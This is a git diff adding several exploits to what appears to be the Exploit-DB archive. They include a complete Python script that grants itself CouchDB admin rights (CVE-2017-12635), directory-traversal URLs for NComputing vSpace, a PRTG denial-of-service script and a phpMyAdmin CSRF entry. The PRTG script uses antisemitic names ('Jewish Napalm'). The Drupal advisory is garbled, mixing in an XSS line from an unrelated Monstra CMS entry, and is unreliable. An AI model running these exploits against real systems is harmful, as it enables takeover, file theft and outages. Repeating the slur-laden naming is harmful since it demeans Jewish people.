diff --git a/exploits/linux/webapps/44498.py b/exploits/linux/webapps/44498.py
new file mode 100755
index 000000000..cc1a318c3
--- /dev/null
+++ b/exploits/linux/webapps/44498.py
@@ -0,0 +1,66 @@
+# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
+# Date: 2017-08-07
+# Exploit Author: Sebastián Castro @r4wd3r
+# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
+# Software Link: http://couchdb.apache.org/
+# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
+# CVE : CVE-2017-12635
+
+#!/usr/bin/env python
+
+import argparse
+import re
+import sys
+import requests
+
+parser = argparse.ArgumentParser(
+ description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
+ ' (CVE-2017-12635)')
+parser.add_argument('host', help='Host to attack.', type=str)
+parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
+parser.add_argument('-u', '--user', help='Username to create as admin.',
+ type=str, default='couchara')
+parser.add_argument('-P', '--password', help='Password of the created user.',
+ type=str, default='couchapass')
+args = parser.parse_args()
+
+host = args.host
+port = args.port
+user = args.user
+password = args.password
+
+pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
+if not pat_ip.match(host):
+ print "[x] Wrong host. Must be a valid IP address."
+ sys.exit(1)
+
+print "[+] User to create: " + user
+print "[+] Password: " + password
+print "[+] Attacking host " + host + " on port " + port
+
+url = 'http://' + host + ':' + port
+
+try:
+ rtest = requests.get(url, timeout=10)
+except requests.exceptions.Timeout:
+ print "[x] Server is taking too long to answer. Exiting."
+ sys.exit(1)
+except requests.ConnectionError:
+ print "[x] Unable to connect to the remote host."
+ sys.exit(1)
+
+# Payload for creating user
+cu_url_payload = url + "/_users/org.couchdb.user:" + user
+cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
+
+try:
+ rcu = requests.put(cu_url_payload, data=cu_data_payload)
+except requests.exceptions.HTTPError:
+ print "[x] ERROR: Unable to create the user on remote host."
+ sys.exit(1)
+
+if rcu.status_code == 201:
+ print "[+] User " + user + " with password " + password + "successfully created."
+ sys.exit(0)
+else:
+ print "[x] ERROR " + rcu.status_code + ": Unable to create the user on remote host."
\ No newline at end of file
diff --git a/exploits/php/webapps/44496.html b/exploits/php/webapps/44496.html
new file mode 100644
index 000000000..e6f689940
--- /dev/null
+++ b/exploits/php/webapps/44496.html
@@ -0,0 +1,24 @@
+# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
+# Date: 2018-04-20
+# Software Link: https://www.phpmyadmin.net/
+# Author: @revengsh & @0x00FI
+# CVE: CVE-2018-10188
+# Category: Webapps
+
+
+#1. Description
+#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
+#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
+#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
+
+
+
+
+
+ Drop database
+
+
+
+
+#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
+#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188
\ No newline at end of file
diff --git a/exploits/php/webapps/44501.txt b/exploits/php/webapps/44501.txt
new file mode 100644
index 000000000..70c8b3ee5
--- /dev/null
+++ b/exploits/php/webapps/44501.txt
@@ -0,0 +1,23 @@
+#Title: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
+#Author: Larry W. Cashdollar
+#Date: 2018-03-30
+#CVE-ID: CVE-2018-9205
+#Download Site: https://www.drupal.org/project/avatar_uploader
+#Vendor: https://www.drupal.org/u/robbinzhao
+#Vendor Notified: 2018-04-02
+#Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
+#Advisory: http://www.vapidlabs.com/advisory.php?v=202
+
+#Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
+#Vulnerability:
+#The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory:
+
+alert(document.cookie)
+#5. visit http:///monstra/blog/.php, you will triage JavaScript execution
+
+
+
+#Exploit Code:
+
+or
+
\ No newline at end of file
diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt
new file mode 100644
index 000000000..df89b19d3
--- /dev/null
+++ b/exploits/windows/webapps/44497.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
+# Date: 2018-04-20
+# Software Vendor: NComputing
+# Software Link:
+# Author: Javier Bernardo
+# CVE: CVE-2018-10201
+# Category: Webapps
+
+#[Description]
+#
+#It is possible to read arbitrary files outside the root directory of
+#the web server. This vulnerability could be exploited remotely by a
+#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
+#directory-traversal pattern to TCP port 8667.
+#
+#An attacker can make use of this vulnerability to step out of the root
+#directory and access other parts of the file system. This might give
+#the attacker the ability to view restricted files, which could provide
+#the attacker with more information required to further compromise the system.
+
+#[PoC]
+
+nmap -p T:8667 -Pn your_vSpace_server
+
+Nmap scan report for your_vSpace_server (x.x.x.x)
+Host is up (0.044s latency).
+
+PORT STATE SERVICE
+8667/tcp open unknown
+
+http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
+
+http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
+
+http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
+
+http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/44500.py b/exploits/windows_x86/dos/44500.py
new file mode 100755
index 000000000..a4463456e
--- /dev/null
+++ b/exploits/windows_x86/dos/44500.py
@@ -0,0 +1,80 @@
+# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
+# Date: 2018-04-21
+# Exploit Author: Lucas "luriel" Carmo
+# Vendor Homepage: https://www.paessler.com/prtg
+# Software Link: https://www.paessler.com/download/prtg-download
+# Version: 18.1.39.1648
+# CVE : CVE-2018-10253
+# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
+# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
+
+#!/usr/bin/python
+
+import requests
+import sys
+import os
+import re
+import socket
+
+green = "\033[1;32m"
+yellow = '\033[1;33m'
+normal = '\033[0;0m'
+banner = """
+ ██╗███████╗██╗ ██╗██╗███████╗██╗ ██╗ ███╗ ██╗ █████╗ ██████╗ █████╗ ██╗ ███╗ ███╗
+ ██║██╔════╝██║ ██║██║██╔════╝██║ ██║ ████╗ ██║██╔══██╗██╔══██╗██╔══██╗██║ ████╗ ████║
+ ██║█████╗ ██║ █╗ ██║██║███████╗███████║ ██╔██╗ ██║███████║██████╔╝███████║██║ ██╔████╔██║
+██ ██║██╔══╝ ██║███╗██║██║╚════██║██╔══██║ ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║ ██║╚██╔╝██║
+╚█████╔╝███████╗╚███╔███╔╝██║███████║██║ ██║ ██║ ╚████║██║ ██║██║ ██║ ██║███████╗██║ ╚═╝ ██║
+ ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
+"""
+
+
+banner2 = """
+ Author: @Lucas "luriel" Carmo
+"""
+
+os.system('clear')
+
+print(green+banner)
+print(yellow+banner2)
+print(normal)
+
+def check_http(url):
+ pattern = re.compile("http://")
+ return re.search(pattern, url)
+
+def sanitize_url(url):
+ if(not check_http(url)):
+ return "http://" + url
+ return url
+
+def check_server(url):
+ r = requests.get(url, timeout=4)
+ code = r.status_code
+
+def send_jewish_payload(url):
+ payload = {'file':'addmap.htm'}
+ r = requests.post(url, params=payload)
+
+def main():
+ try:
+ if len(sys.argv) <= 3 and len (sys.argv) >= 2:
+ try:
+ url = sanitize_url(sys.argv[1])
+ print(' [#] LOADING!')
+ if (check_server(url) != 404):
+ send_jewish_payload(url)
+ else:
+ print(' [!] Server shutdown or not found')
+ except requests.exceptions.ConnectionError:
+ print(' [~] BOOOOOM! PRTG Server has been exploded!')
+ except requests.exceptions.InvalidURL:
+ print(' [!] Invalid URL')
+ except requests.exceptions.Timeout:
+ print(' [!] Connection Timeout\n')
+ else:
+ print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
+ except KeyboardInterrupt:
+ print(' [!] Jewish Napalm Canceled;.....[./]')
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8446b9183..fc31b6a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5941,6 +5941,7 @@ id,file,description,date,author,type,platform,port
44490,exploits/linux/dos/44490.txt,"PDFunite 0.41.0 - '.pdf' Local Buffer Overflow",2018-04-18,Hamm3r.py,dos,linux,
44491,exploits/multiple/dos/44491.txt,"RSVG 2.40.13 / 2.42.2 - '.svg' Buffer Overflow",2018-04-18,Hamm3r.py,dos,multiple,
44494,exploits/windows/dos/44494.py,"VX Search 10.6.18 - 'directory' Local Buffer Overflow",2018-04-18,"Kevin McGuigan",dos,windows,
+44500,exploits/windows_x86/dos/44500.py,"PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)",2018-04-23,luriel,dos,windows_x86,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39188,3 +39189,8 @@ id,file,description,date,author,type,platform,port
44492,exploits/php/webapps/44492.txt,"Joomla! Component JS Jobs 1.2.0 - Cross-Site Request Forgery",2018-04-18,"Sureshbabu Narvaneni",webapps,php,80
44493,exploits/xml/webapps/44493.txt,"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities",2018-04-18,bzyo,webapps,xml,
44495,exploits/php/webapps/44495.txt,"Cobub Razor 0.8.0 - Physical path Leakage",2018-04-20,Kyhvedn,webapps,php,
+44496,exploits/php/webapps/44496.html,"phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery",2018-04-23,revengsh,webapps,php,
+44497,exploits/windows/webapps/44497.txt,"Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC",2018-04-23,"Javier Bernardo",webapps,windows,
+44498,exploits/linux/webapps/44498.py,"Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation",2018-04-23,r4wd3r,webapps,linux,
+44501,exploits/php/webapps/44501.txt,"Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure",2018-04-23,"Larry W. Cashdollar",webapps,php,
+44502,exploits/php/webapps/44502.txt,"Monstra cms 3.0.4 - Persitent Cross-Site Scripting",2018-04-23,"Wenming Jiang",webapps,php,